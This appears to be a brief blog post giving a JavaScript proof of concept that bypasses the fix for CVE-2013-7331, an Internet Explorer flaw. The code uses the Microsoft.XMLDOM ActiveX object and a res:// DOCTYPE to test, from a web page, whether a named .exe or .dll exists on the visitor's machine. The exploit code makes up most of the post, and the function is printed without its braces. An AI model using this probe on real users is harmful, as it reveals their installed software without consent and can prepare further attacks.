This bug was recently (2017) patched

CVE-2013-7331 Bypass

Changes from the original PoC are "gigantic" (in green)

// CVE-2013-7331 Bypass.

function fileExists(fileName)
   // File must be .exe or .dll
   var xmlDoc = new ActiveXObject("Microsoft.XMLDOM");
   xmlDoc.async = true;
   xmlDoc.loadXML('<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "res://' + fileName + '/16/1">');
   return xmlDoc.parseError == -2147467259; // Err number used is different than the one in the original PoC.

To understand what's the /16/1, please read the previous blog-post